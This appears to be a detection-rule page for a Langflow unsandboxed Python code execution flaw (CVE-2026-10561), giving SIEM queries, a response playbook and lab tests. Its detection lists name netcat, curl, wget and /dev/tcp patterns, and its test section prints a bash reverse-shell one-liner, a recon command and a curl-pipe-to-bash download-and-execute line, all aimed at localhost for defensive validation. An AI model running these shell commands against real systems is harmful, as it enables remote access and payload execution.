CVE-2026-10561

Langflow PythonREPLComponent Unsandboxed Code Execution (CVE-2026-10561)

Execution Privilege Escalation Last updated:

Detects exploitation of CVE-2026-10561, a critical (CVSS 9.9) remote code execution and privilege escalation vulnerability in Langflow versions prior to 1.10.1. The PythonREPLComponent executes user-supplied Python code without a sandbox, allowing any authenticated user to run arbitrary code with the privileges of the Langflow process. This detection looks for the Langflow server process (uvicorn/python running langflow) spawning unexpected child processes (shells, interpreters, reconnaissance binaries, reverse-shell patterns) and for suspicious API activity against the flow build/run endpoints that carry PythonREPLComponent payloads.

Vulnerability Intelligence

Public PoC

What is CVE-2026-10561 Langflow PythonREPLComponent Unsandboxed Code Execution (CVE-2026-10561)?

Langflow PythonREPLComponent Unsandboxed Code Execution (CVE-2026-10561) (CVE-2026-10561) maps to the Execution and Privilege Escalation tactics — the adversary is trying to run malicious code in MITRE ATT&CK.

This page provides production-ready detection logic for Langflow PythonREPLComponent Unsandboxed Code Execution (CVE-2026-10561), covering the data sources and telemetry it touches: Microsoft Defender for Endpoint. The queries below are rated critical severity at high confidence, and ship for 7 SIEM platforms — KQL, SPL, Elastic, QRadar, Sumo, YARA-L, LogScale.

MITRE ATT&CK

Tactic
Execution Privilege Escalation
Microsoft Sentinel / Defender
kusto
let langflowParents = dynamic(["python","python3","uvicorn","gunicorn","langflow"]);
let suspiciousChildren = dynamic(["sh","bash","zsh","dash","nc","ncat","netcat","curl","wget","whoami","id","uname","cmd.exe","powershell.exe","pwsh.exe"]);
DeviceProcessEvents
| where InitiatingProcessFileName has_any (langflowParents)
    and (InitiatingProcessCommandLine has "langflow" or InitiatingProcessCommandLine has "uvicorn")
| where FileName has_any (suspiciousChildren)
| where ProcessCommandLine has_any ("-c","/dev/tcp","base64","socket","subprocess","os.system","exec(","reverse","bash -i")
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, ReportId
| order by Timestamp desc

Flags the Langflow Python server process spawning shells or recon/network binaries with command lines indicative of injected PythonREPLComponent code.

critical severity high confidence

Data Sources

Microsoft Defender for Endpoint

Required Tables

DeviceProcessEvents

False Positives

  • Legitimate Langflow custom components that intentionally shell out for data integration tasks
  • Administrator debugging sessions launching shells from the Langflow service account
  • Health-check or monitoring scripts spawned by the Langflow container entrypoint

Sigma rule & cross-platform mapping

The detection logic for Langflow PythonREPLComponent Unsandboxed Code Execution (CVE-2026-10561) (CVE-2026-10561) above is provided in a vendor-neutral form so you can deploy it on any SIEM. The same logic is shipped here as native KQL (Microsoft Sentinel / Defender), SPL (Splunk), Elastic (Elastic Security (EQL)), QRadar (IBM QRadar (AQL)), Sumo (Sumo Logic CSE), YARA-L (Google Chronicle / SecOps), LogScale (CrowdStrike LogScale (CQL)) queries. In Sigma terms, this detection targets the following logsource:

logsource:
  category: process_creation
  product: windows

Browse the community-maintained Sigma rules for this technique:


Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Langflow PythonREPL reverse shell simulation

    Expected signal: Process launch: python3 parent spawning bash child with /dev/tcp reverse-shell command line.

  2. Test 2Langflow PythonREPL recon command execution

    Expected signal: python3 process spawning sh -c invoking whoami/id/uname.

  3. Test 3Langflow PythonREPL download-and-execute

    Expected signal: python3 parent spawning bash/curl child with piped execution command line.


Response Playbook

Triage

  1. Confirm the Langflow version on the affected host (`pip show langflow`); versions < 1.10.1 are vulnerable to unsandboxed PythonREPLComponent execution.
  2. Correlate the alerting child process with the Langflow access logs to identify the authenticated user/API key that submitted the flow run or build request.
  3. Review the parent Langflow process command line and the spawned child command line to determine whether the execution is a known custom component or injected attacker code (reverse shell, recon, download-and-execute).
  4. Determine whether the spawned process achieved outbound network connectivity or wrote new executables/persistence artifacts.

Containment

  1. Isolate the affected Langflow host from the network to stop any active reverse shell or lateral movement.
  2. Revoke the API key / session token of the authenticated user that triggered the PythonREPLComponent execution and disable the account pending investigation.
  3. Upgrade Langflow to >= 1.10.1 (which removes unsandboxed PythonREPLComponent execution) or, as an interim measure, restrict/disable the Python REPL component and place the service behind strict network ACLs.

Evidence Collection

  1. Capture the full Langflow application logs, uvicorn/gunicorn access logs, and the flow JSON definitions submitted around the alert time.
  2. Preserve process execution telemetry (parent/child, command lines, hashes) and any files written by the spawned process.
  3. Snapshot the host or container filesystem and collect network connection logs for the Langflow service account.

Escalation Criteria

  • ! Escalate to incident response if the spawned child established an outbound/reverse connection or executed credential-access or recon commands.
  • ! Escalate if evidence shows privilege escalation beyond the Langflow service account or lateral movement to other hosts.
  • ! Escalate if the triggering account is unexpected, shared, or shows signs of compromise (impossible travel, brute force precursors).

Investigation Guide

Forensic Artifacts

  • > Langflow/uvicorn access logs showing POST requests to flow build/run endpoints (e.g. /api/v1/build, /api/v1/run) around the alert time
  • > Flow JSON definitions containing a PythonREPLComponent node with attacker code
  • > Process execution records for children of the Langflow Python process, plus any files/persistence they created

Tuning Guidance

Enumerate legitimate custom Langflow components that intentionally spawn subprocesses and allowlist their specific command-line patterns and service-account context. Scope the detection to hosts/containers known to run Langflow to reduce noise, and tighten the suspicious-child list to the binaries never expected in your deployment.


Hunting Queries

Baseline and hunt for any shell/recon children of the Langflow server process across the fleet.

Hunting — KQL
kql
DeviceProcessEvents | where InitiatingProcessCommandLine has "langflow" | where FileName in~ ("sh","bash","nc","ncat","curl","wget","whoami","id") | summarize count() by DeviceName, FileName, ProcessCommandLine, bin(Timestamp, 1h)
Hunting — SPL
spl
index=edr (parent_process=*langflow* OR parent_process=*uvicorn*) (process_name=sh OR process_name=bash OR process_name=nc OR process_name=curl OR process_name=whoami) | stats count by host, process_name, process

Atomic Red Team Tests

Test 1 Langflow PythonREPL reverse shell simulation
linux

Simulates injected PythonREPLComponent code that launches a bash reverse shell from the Langflow process context (lab only).

Command

bash
python3 -c "import subprocess; subprocess.run(['bash','-c','bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'])" &

Cleanup

bash
pkill -f '/dev/tcp/127.0.0.1/4444' 2>/dev/null; true

Expected Telemetry

Process launch: python3 parent spawning bash child with /dev/tcp reverse-shell command line.

Expected Detection

KQL/SPL/EQL rules match the python parent spawning bash with /dev/tcp pattern.

Test 2 Langflow PythonREPL recon command execution
linux

Simulates attacker running host reconnaissance via unsandboxed Python code.

Command

bash
python3 -c "import os; os.system('whoami; id; uname -a')"

Cleanup

bash
echo 'no cleanup required'

Expected Telemetry

python3 process spawning sh -c invoking whoami/id/uname.

Expected Detection

Rules match python parent spawning recon binaries via os.system.

Test 3 Langflow PythonREPL download-and-execute
linux

Simulates injected code that downloads and runs a second-stage payload.

Command

bash
python3 -c "import subprocess; subprocess.run(['bash','-c','curl -s http://127.0.0.1:8000/x.sh | bash'])"

Cleanup

bash
rm -f /tmp/x.sh 2>/dev/null; true

Expected Telemetry

python3 parent spawning bash/curl child with piped execution command line.

Expected Detection

Rules match python parent spawning curl/bash with download-and-execute pattern.

Related Detections